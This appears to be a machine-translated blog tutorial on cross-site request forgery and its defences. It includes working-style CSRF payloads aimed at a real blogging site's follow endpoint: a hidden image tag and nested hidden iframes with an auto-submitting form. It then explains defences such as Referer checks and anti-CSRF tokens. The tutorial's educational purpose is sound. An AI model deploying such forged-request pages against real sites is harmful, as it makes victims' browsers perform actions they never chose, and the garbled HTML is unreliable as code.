The CSRF Attack of web security

What is CSRF?

CSRF (Cross site request forgery), Chinese is requesting forgery across sites. Csrf an attacker who, after the user has logged into the target site, convinces the user to visit an attack page, using the target site's trust to the user to initiate a request for a forged user action on the target site on the attack page, to achieve the purpose of the attack.

As an example,

Simple version:

If the blog park has a add attention to the Get interface, the Bloguserguid parameter is clearly the focus of the person ID, as follows:

http://www.cnblogs.com/mvc/Follow/FollowBlogger.aspx?blogUserGuid=4e8c33d0-77fe-df11-ac81-842b2b196315

Then I just need to write an IMG tag in one of my post content:

<style= "width:0;" src = "http://www.cnblogs.com/mvc/Follow/FollowBlogger.aspx?blogUserGuid=4e8c33d0-77fe-df11-ac81-842b2b196315"    />

So as long as someone opens my blog post, it will automatically follow me.

Upgrade version:

If the blog Park still has a focus on the interface, but has limited the only access to the POST request data. This time to do a third-party page, but it already contains the upgrade version of the form code, and then through the QQ, email and other social tools to spread, tempting users to open, that opened the blog Park users on the recruit.

To correct an IFRAME problem before saying the example, someone would write it directly on a third-party page. As follows:

<!DOCTYPE HTML><HTMLLang= "en -us"><Head><title>CSRF SHOW</title></Head>     <Body>          <!--non-embedding iframe jumps -          <iframestyle= "Display:none;">               <formname= "Form1"Action= "Http://www.cnblogs.com/mvc/Follow/FollowBlogger.aspx"Method= "POST">                    <inputtype= "hidden"name= "Bloguserguid"value= "4e8c33d0-77fe-df11-ac81-842b2b196315"/>                    <inputtype= "Submit"value>               </form>               <Script>Document.forms.form1.submit (); </Script>          </iframe>     </Body></HTML>

This is a problem, because of the origin of the policy , the IFRAME content is not loaded, so the inside of the form submission will certainly not be executed.

PS: I tried Chrome, IE11, Firefox, this is the case.

So it can be resolved with a layer of nested pages, as follows:

First display page (test):

<!DOCTYPE HTML><HTMLLang= "en -us"><Head><title>CSRF SHOW</title></Head>     <Body>          <iframestyle= "Display:none;"src= "test2.html"></iframe>     </Body></HTML>

Second hidden page (test2):

<!DOCTYPE HTML><HTMLLang= "en -us"><Head><title>CSRF GET</title><Body>     <formname= "Form1"Action= "Http://www.cnblogs.com/mvc/Follow/FollowBlogger.aspx"Method= "POST">          <inputtype= "hidden"name= "Bloguserguid"value= "4e8c33d0-77fe-df11-ac81-842b2b196315"/>          <inputtype= "Submit"value>     </form>     <Script>Document.forms.form1.submit (); </Script></Body></HTML>

This can be solved, some people will ask why to add a layer of IFRAME, because the non-embedded IFRAME page will redirect, which reduces the concealment of the attack. In addition, our test page does not use XMLHttpRequest to send post requests because there are cross-domain issues, and the form can post data across domains .

Advanced version:

If the blog Park still has a focus on the interface, has restricted post, but the content is directly pasted into HTML (unfiltered), then suffer from XSS attacks. Then you can embed the above code directly into the blog post, then as long as someone opens my blog, or will automatically follow me, this combination of attack is called XSRF.

The essential reason of CSRF attack

CSRF attack is a Web-based implicit authentication mechanism ! Although the authentication mechanism of the Web can guarantee that a request is from a user's browser, there is no guarantee that the request was sent by the user. CSRF attacks are generally resolved by the server.

Defense of CSRF Tools

1. Try to use post to limit get

The Get interface is too easy to be taken as a csrf attack, as the first example knows, as long as an IMG tag is constructed, and the IMG tag is data that cannot be filtered. Interfaces are best limited to post use, and get is not valid, reducing the risk of attack.

Of course post is not foolproof, as long as the attacker constructs a form, but it needs to be done on a third-party page, which increases the likelihood of exposure.

2. Browser Cookie Policy

IE6, 7, 8, Safari will intercept third-party local cookies (Third-party cookies) by default. But Firefox2, 3, Opera, Chrome, Android and so on will not intercept, so the browser cookie policy to defend against CSRF attack is not reliable, can only be said to reduce the risk.

Ps:cookie is divided into two types, session cookies (which expire after the browser is closed, are saved to memory), Third-party cookies (that is, cookies that expire only after exprie time), which are stored locally.

PS: In addition, if the website return HTTP header contains P3P header, then the browser will be allowed to send third-party cookies.

3. Add Verification Code

A verification code that forces the user to interact with the app in order to complete the final request. In general, the CAPTCHA is a good deterrent to csrf attacks. However, due to user experience, the site cannot add a verification code to all operations. Therefore, the verification code can only be used as an auxiliary means and cannot be used as the main solution.

4. Referer Check

The most common application of Referer check on the Web is "prevent picture hotlinking". Similarly, Referer Check can also be used to check whether a request is from a legitimate "source" (whether the Referer value is a specified page, or the domain of a Web site), and if not, it is most likely a csrf attack.

However, because the server is not always able to take the referer, it can not be used as the main means of CSRF defense. But it is a feasible way to monitor the occurrence of CSRF attacks with Referer check.

5. Anti CSRF Token

Now the industry's defense of CSRF, the consistent practice is to use a token (Anti CSRF token).

Example:

1. The user accesses a form page.

2. The server generates a token, which is placed in the user's session, or in the browser's cookie.

3. The token parameter is included with the page form.

4. After the user submits the request, the service side verifies that the token in the form is consistent with the token in the user's session (or cookie) and is consistent with the legitimate request, not the illegal request.

The value of this token must be random and unpredictable. Due to the presence of tokens, an attacker could no longer construct a request with a legitimate token to implement a CSRF attack. In addition to the use of tokens should pay attention to the confidentiality of tokens , as far as possible to change the sensitive operation from get to post, form or Ajax submitted, to avoid token leakage.

Attention:

CSRF's tokens are only used against CSRF attacks . When there is an XSS vulnerability at the same time, the solution is empty. So the problem with XSS should be solved by using XSS's defense scheme.

Summarize

A CSRF attack is an attack that an attacker can use to manipulate user accounts, typically using anti CSRF tokens to defend against CSRF attacks, while paying attention to the confidentiality and randomness of tokens.

Reference documents:

1. "Talking about the attack mode of CSRF"

2. "White hat speaks web security"

This article for the original article, reproduced please retain the original source, convenient traceability, if there is the wrong place, thank you correct.

This address: http://www.cnblogs.com/lovesong/p/5233195.html

The CSRF Attack of web security